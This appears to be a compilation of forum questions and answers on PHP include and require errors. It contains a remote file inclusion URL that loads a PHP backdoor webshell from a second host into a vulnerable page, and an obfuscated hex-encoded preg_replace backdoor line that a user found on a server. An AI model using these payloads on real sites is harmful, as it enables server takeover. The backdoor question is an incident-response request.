When i am trying to backdoor a web page given to me to find a specific file, upon requesting a shell i am given the following warnings on the page, and no other information is given. Should a shell pop up? I am kind of new to RFI and this is my first time working through it.
The link i used is:
http://10.102.x.x/description.php?page=http://10.102.x.xx//usr/share/webshells/php/php-backdoor.php
The display when searching it was:
Warning: include(http://10.102.x.xx//usr/share/webshells/php/php-backdoor.php): failed to open stream: Connection refused in /var/www/html/description.php on line 5
Warning: include(): Failed opening 'http://10.102.x.xx//usr/share/webshells/php/php-backdoor.php' for inclusion (include_path='.:/usr/local/lib/php') in /var/www/html/description.php on line 5
description.php looks like this:
<?php
$image_name = $_GET['page'];
// Get the description from another file
include($image_name);
?>
What is the issue? I am sort of stuck.
Should i create a HTTP server to push my shell instead? I've read something about this but not sure what that entails
Even a link to an article is appreciated
I don't know how the php script looks like where you try go include the remote page, but it has to be something like:
$incfile = $_REQUEST["file"]; include($incfile.".php");
Related
I have very basic knowledge of coding, I took a copy of our company's website to practice making changes to it.
But when I try to run it I get this error
Warning: require_once(/var/www/html/classes/database_class_pdo.php):
failed to open stream: No such file or directory in
D:\xampp\htdocs\HJ\top.php on line 10
Fatal error: require_once(): Failed opening required
'/var/www/html/classes/database_class_pdo.php'
(include_path='D:\xampp\php\PEAR') in D:\xampp\htdocs\HJ\top.php on
line 10
Please, can someone tell me the issue here?
Thank you.
It's because your php file is trying to open a file named /var/www/html/classes/database_class_pdo.php but cannot find it. Try to see if the path is correct or if the file exists.
I was randomly browsing a site on one of our servers, and I found this bit of code as the second line on index.php:
#preg_replace("\x24\50\x5b\136\x3c\135\x2b\51\x24\163\x69\145","\x65\166\x61\154\x28\47\x24\147\x63\155\x3d\67\x37\67\x37\61\x3b\47\x2e\142\x61\163\x65\66\x34\137\x64\145\x63\157\x64\145\x28\151\x6d\160\x6c\157\x64\145\x28\42\x5c\156\x22\54\x66\151\x6c\145\x28\142\x61\163\x65\66\x34\137\x64\145\x63\157\x64\145\x28\42\x5c\61\x22\51\x29\51\x29\51\x3b\44\x67\143\x6d\75\x37\67\x37\67\x31\73","\x4c\62\x68\166\x62\127\x55\166\x59\62\x78\150\x63\63\x4e\160\x5a\155\x6b\166\x63\110\x56\151\x62\107\x6c\152\x58\62\x68\60\x62\127\x77\166\x62\107\x46\165\x5a\171\x39\152\x59\127\x4e\157\x5a\123\x38\165\x4a\124\x67\171\x4f\105\x55\154\x4d\104\x41\170\x4d\171\x56\103\x4f\105\x59\172\x4a\125\x4a\104\x4d\125\x49\154\x51\152\x49\171\x51\151\x55\60\x52\152\x55\63");
When I run it, I get:
Warning: file(/home/classifi/public_html/lang/cache/.%828E%0013%B8F3%BC1B%B22B%4F57): failed to open stream: No such file or directory
It looks like it's obfuscated to do something that it really shouldn't be doing. Can anyone explain to me how I can figure out what the intention was of this line of code? And whether or not my server was actually hacked?
What was the perpetrator trying to do? It is a site running NOAH CLASSIFIEDS script.
that is an hexa-coded text if you want to see the decoded version then see this
Decoded
I'm trying to require_once a file in a document; here's my current syntax:
$path = $_SERVER['DOCUMENT_ROOT'];
require_once("includes/save-email.php");
The problem is that, when I reload my page in my browser, every element disappears and I get the following two messages:
Warning: require_once(/includes/connect.php) [function.require-once]: failed to open stream: No such file or directory in /homepages/3/[my db name]/htdocs/includes/save-email.php on line 2
Fatal error: require_once() [function.require]: Failed opening required '/includes/connect.php' (include_path='.:/usr/lib/php5') in /homepages/3/[my db name]/htdocs/includes/save-email.php on line 2
I've tried every variation of the link I can think of, including ../link, ./link, /link, and link.
Strangely enough, when I include an element of the layout using the same overall syntax (replacing require_once with include), that element loads without any errors, even though it's in the same directory.
I'm not sure that it matters, but my server is run by 1&1.
require_once(/includes/connect.php) will look for the file in the root of your server not in the current folder
repalace
require_once(/includes/connect.php)
by
require_once(includes/connect.php)
in save-email.php on line 2
setting $path won't do anything. you will need to have the includes folder in the same folder as this php document.
I'm in the middle of some work and suddenly I get this.
Warning: require(/opt/lampp/htdocs/ERP/laravel/÷5 ication)
[function.require]: failed to open stream: No such file or directory
in /opt/lampp/htdocs/ERP/public/index.php on line 34
Fatal error: require() [function.require]: Failed opening required
'/opt/lampp/htdocs/ERP/laravel/÷5 ication'
(include_path='.:/opt/lampp/lib/php') in
/opt/lampp/htdocs/ERP/public/index.php on line 34
This error is shown on some requests that have no relation, so there is not a problem with them. This problem started showing a few hours ago
I have checked the files mentioned on the message and they are OK, based on the download I just made to make sure.
If I keep refreshing the page the file name changes. If I insist, it will end up loading my page. This process is costing me a lot of time, I'm trying to make some tests and sometimes this message shows up.
Well...you said that it happens in same pages that make requests, take a good look on your requests and try looking for something wrong.
A good tip is to use the Profile on your framework configuration. You will have a bottom bar with details about the queries executed and logs created.
I think that will help you find the problem.
I have encountered a problem that I have not come accross yet when setting up a log in page using php.
The page has a error message that relates to line 1 ( require_once('../Connections/Login.php)
that states
[function.require-once]: failed to open stream: No such file or directory
Fatal Error: require_once() [function.require]: failed opening required ... (include_path='.:/usr/share/pear-php5')
I know it is probably really simple and stupid, but I'm really struggling to self-troubleshoot and would really value some help please?
This is where I have been so confused. I also thought the same, that it just couldn't find the file; however the structure is just as you have said:
htdocs/comparison.php (the log in page)
htdocs/Connections/connComparisonLogin.php
Sorry this is going to confuse you, I simplified the actual script in my original question and here is the actual error message:
Warning: require_once(../Connections/connComparisonLogin.php) [function.require-once]: failed to open stream: No such file or directory in /home/fhlinux135/s/suzukigenuine.com/user/htdocs/comparison.php on line 1
Fatal error: require_once() [function.require]: Failed opening required '../Connections/connComparisonLogin.php' (include_path='.:/usr/share/pear-php5') in /home/fhlinux135/s/suzukigenuine.com/user/htdocs/comparison.php on line 1
Have I done it all wrong?
I think your require statement should be:
require_once 'Connections/connComparisonLogin.php';
Where is your "Connections/Login.php" relative to the currrent php file.
php will look for the file relative to the current file, or, in one of the directories specified in the "include_path" php.ini setting.
The error just means php can't find the Login.php file. Assuming the page you are calling is index.php you should have a director structure like
-Dir1
|-index.php
-Connections
|-Login.php
Why are you going up a directory in your require statement? Remove the "../" from the beginning of your require_once path.